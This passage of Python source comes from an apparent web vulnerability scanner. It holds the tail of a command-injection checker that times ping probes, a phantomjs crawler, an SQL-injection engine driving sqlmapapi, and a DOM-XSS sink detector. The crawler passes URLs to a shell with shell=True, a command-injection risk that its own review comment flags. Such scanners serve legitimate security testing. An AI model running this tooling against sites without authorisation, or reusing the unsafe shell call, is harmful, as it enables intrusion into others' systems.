        Ping payloads: judge by the induced delay (~19s+ for 20 pings)."""
        marker = self.results[0]
        if 'echo' in payload:
            return marker in src and ('echo ' + marker) not in src
        # Time-based detection for the ping probes.
        return (time.time() - ori_time) > 19

    def exit(self):
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs, debug):
        sink = self.logger.debug if debug else self.logger.info
        sink(self.owner, msgs)
class SrcDownloader(object):
    """Downloader: renders each URL with phantomjs (so JS is evaluated) and
    stores the resulting page source in the knowledge base."""

    # FIX: compiled once here instead of on every download_page call.
    _LOGOUT_RE = re.compile(r'.*logout.*', re.IGNORECASE | re.DOTALL)

    def __init__(self, kb, phantomjs_path, evaljs_path, logger, thread_num,
                 filetype_whitelist, depth_limit, temp_dir_path):
        """
        :kb: Universal KnowledgeBase
        :phantomjs_path: path to the phantomjs binary
        :evaljs_path: path to the evaluation JS script
        :logger: output logger
        :thread_num: maximum number of threads
        :filetype_whitelist: allowed file extensions (dict-like lookup)
        :depth_limit: crawl depth limit
        :temp_dir_path: temp directory (crash logs are written here)
        """
        super(SrcDownloader, self).__init__()
        self.kb = kb
        self.logger = logger
        # Trailing '' leaves a separating space before the URL argument.
        self.executable = ' '.join([phantomjs_path, evaljs_path, ''])
        self.filetype_whitelist = filetype_whitelist
        self.depth_limit = depth_limit
        self.temp_dir_path = temp_dir_path
        self.exit_flag = False
        self.task_queue = []
        self.seconds_wait = 1  # poll interval for newly discovered URLs
        # Thread dispatcher
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.download_page,
            logger=self.logger,
            owner='Downloader',
            start_index=0,
            seconds_wait=2
        )

    def engine_start(self):
        """Main loop: download the source of every URL fed by the kb."""
        self.log(['Engine started.'])
        url_count = 0
        while True:
            # Read a batch of URLs; None means the feed is exhausted.
            results = self.kb.read_data(URL, SRC_DOWNLOADER, url_count)
            if results is None:
                break
            # Every URL goes to the task queue for the dispatcher.
            if len(results) > 0:
                url_count += len(results)
                self.task_queue.extend(results)
            self.dispather.dispath_scan_task()
            # Stop once a shutdown has been requested.
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Wait for worker threads to finish.
        self.dispather.suicide()
        self.log(['Engine stopped.'])

    def download_page(self, task, thread_no):
        """Worker: render one page with phantomjs and save its source.

        :task: (url, is_post, status_code, depth)
        :thread_no: thread number
        """
        # Skip when too deep, wrong file type, or the URL looks like a
        # logout link (following it would kill the crawl session).
        if (self.depth_limit < task[3]
                or not self.is_valid_filetype(task[0])
                or self._LOGOUT_RE.search(task[0])):
            return
        self.log(['%d %s' % (task[3], task[0])])
        # Shell command for phantomjs; the URL is prefixed with P/G to mark
        # POST or GET.
        # NOTE(review): shell=True with an interpolated URL is command-
        # injection prone if the crawler can ever be fed hostile URLs —
        # consider subprocess with an argument list instead.
        batcmd = '{phantomjs}"{method}{url}" "{tmpdir}/EagleX/extra/temp"'.format(
            phantomjs=self.executable,
            method=('P' if task[1] == 2 else 'G'),
            url=task[0].replace('"', '""'),
            tmpdir=os.getcwd())
        try:
            result = subprocess.check_output(batcmd,
                                             stderr=subprocess.STDOUT,
                                             shell=True,
                                             universal_newlines=True)
        except subprocess.CalledProcessError as exc:
            # Keep the last crash around for post-mortem inspection.
            self.exc = exc
            self.log(['[ERROR] phantomjs crashed, stderr output saved to CRASH.txt'])
            format_time = time.strftime('%Y-%m-%d %H:%M:%S',
                                        time.localtime(time.time()))
            msg = '''======================={time}========================
***********************************************************
{task}
***********************************************************
===========================================================
'''.format(time=format_time, task=task[0])
            # FIX: context manager closes the handle even if the write fails
            # (previously a plain open/write/close could leak on error).
            with open(self.temp_dir_path + 'CRASH.txt', 'a') as crash_log:
                crash_log.write(msg)
            return
        # Persist the rendered source together with its crawl depth.
        self.kb.save_data(SRC, (task[0], result, task[3]))

    def is_valid_filetype(self, url):
        """Check whether the URL's file extension is whitelisted.

        :url: target URL
        :return: True or False
        """
        extension = os.path.splitext(urlparse(url).path)[1].lstrip('.')
        if not extension:
            return True  # no extension at all: let it through
        return self.filetype_whitelist.get(extension) is not None

    def exit(self):
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs):
        self.logger.debug('Downloader', msgs)
class SqlScanner(object):
    """SQL-injection scanning engine: drives a local sqlmapapi server and
    feeds it URLs taken from the knowledge base."""

    def __init__(self, kb, sqlmapapi_path, sqlmapapi_port, logger, cookie,
                 sqlmapapi_addr, thread_num, temp_dir_path):
        """
        :kb: Universal KnowledgeBase
        :sqlmapapi_path: path to the sqlmapapi script
        :sqlmapapi_port: port the server listens on
        :sqlmapapi_addr: listen address, usually localhost
        :logger: output logger
        :cookie: cookie, empty by default
        :thread_num: maximum number of threads
        :temp_dir_path: temp directory for the server's stdout/stderr logs
        """
        super(SqlScanner, self).__init__()
        self.kb = kb
        self.logger = logger
        self.cookie = cookie
        self.temp_dir_path = temp_dir_path
        self.task_queue = []
        self.seconds_wait = 2  # poll interval for newly discovered URLs
        self.sqlmapapi_process = None
        self.exit_flag = False
        self.sqlmapapi_server = ''.join(
            ['http://', sqlmapapi_addr, ':', str(sqlmapapi_port)])
        # One AutoSqli slot per worker thread, guarded by a lock.
        self.autosqli_list = [None] * thread_num
        self.autosqli_list_mutex = threading.Lock()
        # Thread dispatcher
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.check_on_sql_injection,
            logger=self.logger,
            owner='SqlScanner',
            start_index=0,
            seconds_wait=1)
        # Bring up the sqlmapapi REST server.
        self.start_sqlmapapi_server(sqlmapapi_path, sqlmapapi_addr,
                                    sqlmapapi_port)

    def start_sqlmapapi_server(self, path, addr, port):
        """Start the sqlmapapi server, redirecting its output to files.

        :path: executable script path
        :addr: listen address
        :port: listen port
        """
        # Handles stay open for the subprocess's lifetime; they are closed
        # in clean_up_the_mess().
        self.f_out = open(self.temp_dir_path + 'sqlmapapi.stdout.temp', 'w')
        self.f_err = open(self.temp_dir_path + 'sqlmapapi.stderr.temp', 'w')
        # The working directory is deliberately NOT changed: sqlmap lives in
        # the project root and its api.py was adjusted accordingly.
        self.sqlmapapi_process = subprocess.Popen(
            ['python', path, '-s', '-H', addr, '-p', str(port)],
            shell=False,
            stdout=self.f_out,
            stderr=self.f_err)
        self.log(['sqlmapapi server started at %s:%d.' % (addr, port)], DEBUG)

    def engine_start(self):
        """Main loop of the SQL scanner: pull URLs from the kb and test."""
        self.log(['Engine started.'], DEBUG)
        url_count = 0
        while True:
            # Read a batch of URLs; None means the feed is exhausted.
            results = self.kb.read_data(URL, SQL_SCANNER, url_count)
            if results is None:
                break
            # Queue everything with parameters (GET with params or POST).
            if len(results) > 0:
                url_count += len(results)
                self.task_queue.extend([result for result in results
                                        if result[1] >= 1])
            self.dispather.dispath_scan_task()
            # Stop once a shutdown has been requested.
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Tear everything down.
        self.clean_up_the_mess()
        self.log(['Engine stopped.'], DEBUG)

    def check_on_sql_injection(self, task, thread_no):
        """Worker: run sqlmapapi against a single URL and store findings.

        :task: (url, is_post, code, depth) tuple
        :thread_no: thread number, indexes the AutoSqli slot
        """
        url = task[0]
        para = ''
        # For POST requests the parameters travel separately.
        if task[1] == 2:
            url, para = url.split('?', 1)
        # Create the AutoSqli driver and register it so exit() can kill it.
        sqli = AutoSqli(server=self.sqlmapapi_server,
                        target=url,
                        logger=self.logger,
                        timeout=120,
                        data=para,
                        referer='',
                        cookie=self.cookie,
                        other_options={},
                        retries=3)
        with self.autosqli_list_mutex:
            self.autosqli_list[thread_no] = sqli
        # Reassemble the full URL for reporting.
        # FIX: was an easy-to-misread conditional expression
        # (url += '?' + para if len(para) > 0 else '').
        if len(para) > 0:
            url += '?' + para
        # Run the scan and handle the outcome.
        result = sqli.scan()
        if result is None:
            self.log(['[INVULNERABLE] ' + url], DEBUG)
        elif len(result) > 0:
            # Extract dbms/payload details and persist the finding.
            (dbms, payload) = self.get_info(result)
            self.log(['[VULNERABLE] ' + url,
                      '[DBMS] ' + dbms,
                      '[PAYLOAD] ' + payload], not DEBUG)
            self.kb.save_data(SQL, (url, dbms, payload))

    def get_info(self, result):
        """Extract (dbms, payload) from sqlmapapi's JSON result.

        Multiple payloads are joined with newlines.  Parsing is best-effort:
        any missing/odd structure yields partial or empty strings.
        :result: JSON data as returned by sqlmapapi
        :return: (dbms, payload)
        """
        payload = ''
        dbms = ''
        try:
            data = result[0]['value'][0]['data']
            dbms = result[0]['value'][0]['dbms']
            if dbms is None:
                dbms = ''
            if data is None:
                return (dbms, payload)
            # Join every non-empty payload with '\n'.
            for key in list(data):
                try:
                    item = data[key]['payload']
                    if item is not None:
                        payload += item + '\n'
                except Exception:
                    # Malformed entry: skip it (best-effort parsing).
                    pass
            if len(payload) > 0:
                payload = payload[:-1]  # drop the trailing newline
        except Exception:
            # Unexpected JSON shape: return whatever was gathered so far.
            pass
        return (dbms, payload)

    def clean_up_the_mess(self):
        """Kill the AutoSqli drivers, stop the threads and the server."""
        # Kill every in-flight scan.
        with self.autosqli_list_mutex:
            for x in self.autosqli_list:
                if x is not None:
                    x.exit()
        # Wait for worker threads to finish.
        self.dispather.suicide()
        # Kill the sqlmapapi server and close its log files.
        if self.sqlmapapi_process:
            try:
                self.sqlmapapi_process.kill()
                self.log(['sqlmapapi server stopped.'], DEBUG)
                self.f_out.close()
                self.f_err.close()
            except Exception:
                # Best effort: the process may already be gone.
                pass

    def exit(self):
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs, debug):
        if debug:
            self.logger.debug('SqlScanner', msgs)
        else:
            self.logger.info('SqlScanner', msgs)
class DomXss(object):
    """Detect potential DOM-based XSS by inspecting page and script sources
    for user-controllable sink/source combinations; no payload is sent."""

    def __init__(self, kb, logger, thread_num, cookie):
        """
        :kb: Universal KnowledgeBase
        :logger: output logger
        :thread_num: number of worker threads
        :cookie: cookie sent with page requests
        """
        super(DomXss, self).__init__()
        self.kb = kb
        self.logger = logger
        self.cookie = cookie
        self.owner = 'DomXss'
        self.task_queue = []
        # Resolved script URLs already fetched (shared across tasks).
        self.visited = {}
        self.seconds_wait = 2
        self.exit_flag = False
        # Thread dispatcher
        self.dispather = ParallelDispatcher(thread_num=thread_num,
                                            data_source=self.task_queue,
                                            execute_func=self.check_on_dom_xss,
                                            logger=self.logger,
                                            owner=self.owner,
                                            start_index=0,
                                            seconds_wait=2)

    def engine_start(self):
        """Main loop of the DOM-XSS detector: pull URL batches from the kb
        and dispatch them until the feed is exhausted."""
        url_count = 0
        while True:
            # Read a batch of URLs; None means the feed is exhausted.
            results = self.kb.read_data(URL, XSS_SCANNER, url_count)
            if results is None:
                break
            # Every URL is queued (static analysis works on any page).
            if len(results) > 0:
                url_count += len(results)
                self.task_queue.extend(results)
            self.dispather.dispath_scan_task()
            # Stop once a shutdown has been requested.
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Wait for worker threads to finish.
        self.dispather.suicide()

    def check_on_dom_xss(self, task, thread_no):
        """Worker: look for DOM sinks in the page itself and in every
        external script it references.

        :task: (url, is_post, code, depth) tuple
        :thread_no: current thread number
        """
        # Fetch the page, then collect the source of each referenced script.
        # NOTE: src is keyed by the raw script reference (js), while the
        # dedup cache (self.visited) is keyed by the resolved link.
        src = {task[0]: send_common_request(task[0], task[1], self.cookie)}
        for js in _script_src_re.findall(src[task[0]]):
            # Abort quickly when the engine is shutting down.
            if self.exit_flag:
                self.log(['Thread killed, abort on %s' % task[0]], DEBUG)
                return
            # Fetch each script once; repeats are skipped via self.visited.
            # Known limitation: if a shared script contains a sink, only the
            # first page that pulls it in gets the report — acceptable,
            # since at least one finding surfaces.
            link = url_process(js, task[0])
            if self.visited.get(link) is not None:
                continue
            self.visited[link] = 0
            src[js] = send_common_request(link, 0, '')
        # Scan every collected source; the first hit is reported and saved.
        for url in src.keys():
            res = self.analyze_dom_result(src[url])
            if res is not None:
                # Report and persist the finding.
                self.log([
                    '[VULNERABLE] ' + task[0],
                    '[FILE] ' + url,
                    '[KEYWORD] ' + res
                ], not DEBUG)
                self.kb.save_data(XSS, (task[0], url, res, 'DOM'))
                break
        else:
            # Loop completed without a break: nothing suspicious found.
            self.log(['[INVULNERABLE] ' + task[0]], DEBUG)

    def analyze_dom_result(self, response):
        """Check the source for DOM output points: user-controlled values
        flowing into known sink function calls.

        :response: page or script source code
        :return: None when nothing is found, otherwise a '|'-joined string
                 of the user-controlled keywords seen inside sink calls
        """
        res = ''
        for function_re in JS_FUNCTION_CALLS:
            # Only the first match of each sink pattern is inspected.
            parameters = function_re.search(response)
            if parameters:
                for user_controlled in DOM_USER_CONTROLLED:
                    if user_controlled in parameters.groups()[0]:
                        # Accumulate with a leading '|', stripped on return.
                        res = '|'.join([res, user_controlled])
        if len(res) > 0:
            return res[1:]
        else:
            return None

    def exit(self):
        # Request shutdown; engine_start notices the flag on its next pass.
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs, debug):
        if debug:
            self.logger.debug(self.owner, msgs)
        else:
            self.logger.info(self.owner, msgs)